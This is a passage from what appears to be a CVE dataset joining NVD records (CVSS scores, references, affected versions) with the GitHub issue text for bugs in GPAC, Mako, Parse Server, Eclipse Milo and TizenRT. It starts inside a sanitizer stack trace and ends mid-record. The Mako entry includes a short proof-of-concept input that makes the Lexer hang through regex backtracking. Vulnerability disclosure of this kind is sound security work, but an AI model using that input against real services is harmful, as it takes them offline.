#221 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847
#222 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292
#223 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109
#224 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847
#225 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292
#226 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109
#227 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847
#228 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292
#229 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109
#230 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847
#231 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292
#232 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109
#233 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847
#234 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292
#235 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109
#236 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847
#237 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292
#238 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109
#239 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847
#240 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292
#241 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109
#242 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847
#243 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292
#244 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109
#245 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847
#246 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292
#247 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109
#248 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847
#249 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292
#250 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109
SUMMARY: AddressSanitizer: stack-overflow (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x10364c)
==15396==ABORTING
``` | AddressSanitizer: stack-overflow when processing ISOM_IOD | https://api.github.com/repos/gpac/gpac/issues/2216/comments | 0 | 2022-07-02T17:45:58Z | 2022-07-12T17:13:10Z | https://github.com/gpac/gpac/issues/2216 | 1,292,105,535 | 2,216 | 4,106 |
CVE-2022-40023 | 2022-09-07T13:15:09.953 | Sqlalchemy mako before 1.2.2 is vulnerable to Regular expression Denial of Service when using the Lexer class to parse. This also affects babelplugin and linguaplugin. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/sqlalchemy/mako/blob/c2f392e0be52dc67d1b9770ab8cce6a9c736d547/mako/ext/extract.py#L21"
},
{
"source": "cve@mitre.org",
"tags": [
"Patch"
],
"url": "https://github.com/sqlalchemy/mako/commit/925760291d6efec64fda6e9dd1fd9cfbd5be068c"
},
{
"source": "cve@mitre.org",
"tags": [
"Issue Tracking",
"Patch"
],
"url": "https://github.com/sqlalchemy/mako/issues/366"
},
{
"source": "cve@mitre.org",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.debian.org/debian-lts-announce/2022/09/msg00026.html"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://pyup.io/posts/pyup-discovers-redos-vulnerabilities-in-top-python-packages/"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://pyup.io/vulnerabilities/CVE-2022-40023/50870/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/sqlalchemy/mako/blob/c2f392e0be52dc67d1b9770ab8cce6a9c736d547/mako/ext/extract.py#L21"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch"
],
"url": "https://github.com/sqlalchemy/mako/commit/925760291d6efec64fda6e9dd1fd9cfbd5be068c"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking",
"Patch"
],
"url": "https://github.com/sqlalchemy/mako/issues/366"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.debian.org/debian-lts-announce/2022/09/msg00026.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://pyup.io/posts/pyup-discovers-redos-vulnerabilities-in-top-python-packages/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://pyup.io/vulnerabilities/CVE-2022-40023/50870/"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:sqlalchemy:mako:*:*:*:*:*:*:*:*",
"matchCriteriaId": "A85380F0-0A58-4E13-B3E3-3DC01E7ABF3F",
"versionEndExcluding": "1.2.2",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*",
"matchCriteriaId": "07B237A9-69A3-4A9C-9DA0-4E06BD37AE73",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"1333"
] | 1333 | https://github.com/sqlalchemy/mako/issues/366 | [
"Issue Tracking",
"Patch"
] | github.com | [
"sqlalchemy",
"mako"
] | this will crash the Lexer due to the regex:
```py
from mako.lexer import Lexer
template = "<%0" + '"' * 3000
Lexer(template).parse
``` | quoted sections in tag not grouped correctly | https://api.github.com/repos/sqlalchemy/mako/issues/366/comments | 1 | 2022-08-29T15:48:22Z | 2022-08-29T18:06:27Z | https://github.com/sqlalchemy/mako/issues/366 | 1,354,517,220 | 366 | 4,107 |
CVE-2022-36079 | 2022-09-07T21:15:08.560 | Parse Server is an open source backend that can be deployed to any infrastructure that can run Node.js. Internal fields (keys used internally by Parse Server, prefixed by `_`) and protected fields (user defined) can be used as query constraints. Internal and protected fields are removed by Parse Server and are only returned to the client using a valid master key. However, using query constraints, these fields can be guessed by enumerating until Parse Server, prior to versions 4.10.14 or 5.2.5, returns a response object. The patch available in versions 4.10.14 and 5.2.5 requires the maser key to use internal and protected fields as query constraints. As a workaround, implement a Parse Cloud Trigger `beforeFind` and manually remove the query constraints. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 8.6,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 4,
"source": "security-advisories@github.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "security-advisories@github.com",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/parse-community/parse-server/commit/634c44acd18f6ee6ec60fac89a2b602d92799bec"
},
{
"source": "security-advisories@github.com",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/parse-community/parse-server/commit/e39d51bd329cd978589983bd659db46e1d45aad4"
},
{
"source": "security-advisories@github.com",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/parse-community/parse-server/issues/8143"
},
{
"source": "security-advisories@github.com",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/parse-community/parse-server/issues/8144"
},
{
"source": "security-advisories@github.com",
"tags": [
"Release Notes",
"Third Party Advisory"
],
"url": "https://github.com/parse-community/parse-server/releases/tag/4.10.14"
},
{
"source": "security-advisories@github.com",
"tags": [
"Release Notes",
"Third Party Advisory"
],
"url": "https://github.com/parse-community/parse-server/releases/tag/5.2.5"
},
{
"source": "security-advisories@github.com",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/parse-community/parse-server/security/advisories/GHSA-2m6g-crv8-p3c6"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/parse-community/parse-server/commit/634c44acd18f6ee6ec60fac89a2b602d92799bec"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/parse-community/parse-server/commit/e39d51bd329cd978589983bd659db46e1d45aad4"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/parse-community/parse-server/issues/8143"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/parse-community/parse-server/issues/8144"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Release Notes",
"Third Party Advisory"
],
"url": "https://github.com/parse-community/parse-server/releases/tag/4.10.14"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Release Notes",
"Third Party Advisory"
],
"url": "https://github.com/parse-community/parse-server/releases/tag/5.2.5"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/parse-community/parse-server/security/advisories/GHSA-2m6g-crv8-p3c6"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:parseplatform:parse-server:*:*:*:*:*:node.js:*:*",
"matchCriteriaId": "55B47674-02C1-4BE5-B962-AF328A4F99B5",
"versionEndExcluding": "4.10.14",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:parseplatform:parse-server:*:*:*:*:*:node.js:*:*",
"matchCriteriaId": "65395D8C-9056-4F74-B1C4-8CB4723CE12A",
"versionEndExcluding": "5.2.5",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": "5.0.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"200"
] | 200 | https://github.com/parse-community/parse-server/issues/8143 | [
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"parse-community",
"parse-server"
] | Fixes https://github.com/parse-community/parse-server/security/advisories/GHSA-2m6g-crv8-p3c6 | fix: brute force guessing of user sensitive data via search patterns (GHSA-2m6g-crv8-p3c6) | https://api.github.com/repos/parse-community/parse-server/issues/8143/comments | 4 | 2022-09-02T17:52:12Z | 2022-09-03T09:25:15Z | https://github.com/parse-community/parse-server/pull/8143 | 1,360,469,071 | 8,143 | 4,108 |
CVE-2022-36079 | 2022-09-07T21:15:08.560 | Parse Server is an open source backend that can be deployed to any infrastructure that can run Node.js. Internal fields (keys used internally by Parse Server, prefixed by `_`) and protected fields (user defined) can be used as query constraints. Internal and protected fields are removed by Parse Server and are only returned to the client using a valid master key. However, using query constraints, these fields can be guessed by enumerating until Parse Server, prior to versions 4.10.14 or 5.2.5, returns a response object. The patch available in versions 4.10.14 and 5.2.5 requires the maser key to use internal and protected fields as query constraints. As a workaround, implement a Parse Cloud Trigger `beforeFind` and manually remove the query constraints. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 8.6,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 4,
"source": "security-advisories@github.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "security-advisories@github.com",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/parse-community/parse-server/commit/634c44acd18f6ee6ec60fac89a2b602d92799bec"
},
{
"source": "security-advisories@github.com",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/parse-community/parse-server/commit/e39d51bd329cd978589983bd659db46e1d45aad4"
},
{
"source": "security-advisories@github.com",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/parse-community/parse-server/issues/8143"
},
{
"source": "security-advisories@github.com",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/parse-community/parse-server/issues/8144"
},
{
"source": "security-advisories@github.com",
"tags": [
"Release Notes",
"Third Party Advisory"
],
"url": "https://github.com/parse-community/parse-server/releases/tag/4.10.14"
},
{
"source": "security-advisories@github.com",
"tags": [
"Release Notes",
"Third Party Advisory"
],
"url": "https://github.com/parse-community/parse-server/releases/tag/5.2.5"
},
{
"source": "security-advisories@github.com",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/parse-community/parse-server/security/advisories/GHSA-2m6g-crv8-p3c6"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/parse-community/parse-server/commit/634c44acd18f6ee6ec60fac89a2b602d92799bec"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/parse-community/parse-server/commit/e39d51bd329cd978589983bd659db46e1d45aad4"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/parse-community/parse-server/issues/8143"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/parse-community/parse-server/issues/8144"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Release Notes",
"Third Party Advisory"
],
"url": "https://github.com/parse-community/parse-server/releases/tag/4.10.14"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Release Notes",
"Third Party Advisory"
],
"url": "https://github.com/parse-community/parse-server/releases/tag/5.2.5"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/parse-community/parse-server/security/advisories/GHSA-2m6g-crv8-p3c6"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:parseplatform:parse-server:*:*:*:*:*:node.js:*:*",
"matchCriteriaId": "55B47674-02C1-4BE5-B962-AF328A4F99B5",
"versionEndExcluding": "4.10.14",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:parseplatform:parse-server:*:*:*:*:*:node.js:*:*",
"matchCriteriaId": "65395D8C-9056-4F74-B1C4-8CB4723CE12A",
"versionEndExcluding": "5.2.5",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": "5.0.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"200"
] | 200 | https://github.com/parse-community/parse-server/issues/8144 | [
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"parse-community",
"parse-server"
] | Fixes https://github.com/parse-community/parse-server/security/advisories/GHSA-2m6g-crv8-p3c6 | fix: brute force guessing of user sensitive data via search patterns (GHSA-2m6g-crv8-p3c6) | https://api.github.com/repos/parse-community/parse-server/issues/8144/comments | 3 | 2022-09-02T17:52:58Z | 2022-09-03T09:24:10Z | https://github.com/parse-community/parse-server/pull/8144 | 1,360,469,671 | 8,144 | 4,109 |
CVE-2022-25897 | 2022-09-08T05:15:07.410 | The package org.eclipse.milo:sdk-server before 0.6.8 are vulnerable to Denial of Service (DoS) when bypassing the limitations for excessive memory consumption by sending multiple CloseSession requests with the deleteSubscription parameter equal to False. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 5.9,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.2,
"impactScore": 3.6,
"source": "report@snyk.io",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "report@snyk.io",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/eclipse/milo/commit/4534381760d7d9f0bf00cbf6a8449bb0d13c6ce5"
},
{
"source": "report@snyk.io",
"tags": [
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/eclipse/milo/issues/1030"
},
{
"source": "report@snyk.io",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/eclipse/milo/pull/1031"
},
{
"source": "report@snyk.io",
"tags": [
"Third Party Advisory"
],
"url": "https://security.snyk.io/vuln/SNYK-JAVA-ORGECLIPSEMILO-2990191"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/eclipse/milo/commit/4534381760d7d9f0bf00cbf6a8449bb0d13c6ce5"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/eclipse/milo/issues/1030"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/eclipse/milo/pull/1031"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://security.snyk.io/vuln/SNYK-JAVA-ORGECLIPSEMILO-2990191"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:eclipse:milo:*:*:*:*:*:*:*:*",
"matchCriteriaId": "21638D30-0B3C-4457-BEBC-022ACACE81A5",
"versionEndExcluding": "0.6.8",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"770"
] | 770 | https://github.com/eclipse/milo/issues/1030 | [
"Issue Tracking",
"Patch",
"Third Party Advisory"
] | github.com | [
"eclipse",
"milo"
] | The server should allow the maximum number of MonitoredItems that can be created to be configurable via the `OpcUaServerConfigLimits` interface. To best maintain backwards compatibility with the previous server the default value will be `Integer.MAX_VALUE`, which is effectively unlimited. | Allow max MonitoredItems to be configured | https://api.github.com/repos/eclipse-milo/milo/issues/1030/comments | 0 | 2022-08-23T17:26:44Z | 2022-08-24T11:12:05Z | https://github.com/eclipse-milo/milo/issues/1030 | 1,348,292,957 | 1,030 | 4,110 |
CVE-2022-40280 | 2022-09-08T22:15:08.800 | An issue was discovered in Samsung TizenRT through 3.0_GBM (and 3.1_PRE). createDB in security/provisioning/src/provisioningdatabasemanager.c has a missing sqlite3_close after sqlite3_open_v2, leading to a denial of service. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/Samsung/TizenRT/blob/f8f776dd183246ad8890422c1ee5e8f33ab2aaaf/external/iotivity/iotivity_1.2-rel/resource/csdk/security/provisioning/src/provisioningdatabasemanager.c#L100"
},
{
"source": "cve@mitre.org",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/Samsung/TizenRT/issues/5627"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://www.sqlite.org/c3ref/open.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/Samsung/TizenRT/blob/f8f776dd183246ad8890422c1ee5e8f33ab2aaaf/external/iotivity/iotivity_1.2-rel/resource/csdk/security/provisioning/src/provisioningdatabasemanager.c#L100"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/Samsung/TizenRT/issues/5627"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://www.sqlite.org/c3ref/open.html"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:samsung:tizenrt:1.0:m1:*:*:*:*:*:*",
"matchCriteriaId": "6B59E31E-7082-4719-97B6-3ADA43058E65",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:samsung:tizenrt:1.1:-:*:*:*:*:*:*",
"matchCriteriaId": "E625EE90-3CB6-4405-8827-355369A5917E",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:samsung:tizenrt:2.0:-:*:*:*:*:*:*",
"matchCriteriaId": "4EF9DBF2-9C4A-42C2-A799-922485902209",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:samsung:tizenrt:3.0:gbm:*:*:*:*:*:*",
"matchCriteriaId": "59AD1A65-ECC5-4DC0-A7BB-C616E24A42A2",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"772"
] | 772 | https://github.com/Samsung/TizenRT/issues/5627 | [
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"Samsung",
"TizenRT"
] | # Affected components
affected source code file: external/iotivity/iotivity_1.2-rel/resource/csdk/security/provisioning/src/provisioningdatabasemanager.c
# Attack vector(s)
Missing sqlite3_close after sqlite3_open_v2.
Whether or not an error occurs when it is opened, resources associated with the [database connection](https://www.sqlite.org/c3ref/sqlite3.html) handle should be released by passing it to [sqlite3_close()](https://www.sqlite.org/c3ref/close.html) when it is no longer required.
# Suggested description of the vulnerability for use in the CVE
DoS vulnerability in createDB() function in Samsung Electronics TizenRT latest version (and earlier) due to missing sqlite3_close after sqlite3_open_v2.
# Discoverer(s)/Credits
UVScan
# Reference(s)
https://www.sqlite.org/c3ref/open.html
https://github.com/Samsung/TizenRT/blob/f8f776dd183246ad8890422c1ee5e8f33ab2aaaf/external/iotivity/iotivity_1.2-rel/resource/csdk/security/provisioning/src/provisioningdatabasemanager.c#L100 | Security: DoS vulnerability in function createDB() | https://api.github.com/repos/Samsung/TizenRT/issues/5627/comments | 0 | 2022-09-02T04:54:05Z | 2022-09-02T05:14:28Z | https://github.com/Samsung/TizenRT/issues/5627 | 1,359,701,920 | 5,627 | 4,114 |
CVE-2022-40281 | 2022-09-08T22:15:08.843 | An issue was discovered in Samsung TizenRT through 3.0_GBM (and 3.1_PRE). cyassl_connect_step2 in curl/vtls/cyassl.c has a missing X509_free after SSL_get_peer_certificate, leading to information disclosure. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/Samsung/TizenRT/blob/f8f776dd183246ad8890422c1ee5e8f33ab2aaaf/external/curl/vtls/cyassl.c#L545"
},
{
"source": "cve@mitre.org",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/Samsung/TizenRT/issues/5626"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://www.openssl.org/docs/man1.1.1/man3/SSL_get_peer_certificate.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/Samsung/TizenRT/blob/f8f776dd183246ad8890422c1ee5e8f33ab2aaaf/external/curl/vtls/cyassl.c#L545"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/Samsung/TizenRT/issues/5626"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://www.openssl.org/docs/man1.1.1/man3/SSL_get_peer_certificate.html"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:samsung:tizenrt:1.0:m1:*:*:*:*:*:*",
"matchCriteriaId": "6B59E31E-7082-4719-97B6-3ADA43058E65",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:samsung:tizenrt:1.1:-:*:*:*:*:*:*",
"matchCriteriaId": "E625EE90-3CB6-4405-8827-355369A5917E",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:samsung:tizenrt:2.0:-:*:*:*:*:*:*",
"matchCriteriaId": "4EF9DBF2-9C4A-42C2-A799-922485902209",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:samsung:tizenrt:3.0:gbm:*:*:*:*:*:*",
